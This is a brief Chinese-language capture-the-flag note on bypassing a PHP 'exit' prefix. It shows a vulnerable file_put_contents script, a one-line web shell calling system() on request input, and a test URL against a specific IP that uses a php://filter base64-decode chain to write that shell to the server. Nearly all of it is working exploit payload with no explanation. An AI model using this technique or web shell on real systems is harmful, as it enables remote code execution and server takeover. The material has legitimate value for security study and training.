函数绕过
<?php
show_source(__FILE__);
$c = "<?php exit;?>";
@$c.=$_GET['c'];
@$filename = $_GET['file'];
@file_put_contents($filename, $c);
highlight_file('tmp.php');
?> <?php
system($_REQUEST['z']);
?>
测试方法
http://218.2.197.236:29854/index.php?file=php://filter/write=string.strip_tags|convert.base64-decode/resource=tmp.php&c=PD9waHAKc3lzdGVtKCRfUkVRVUVTVFsneiddKTsKPz4=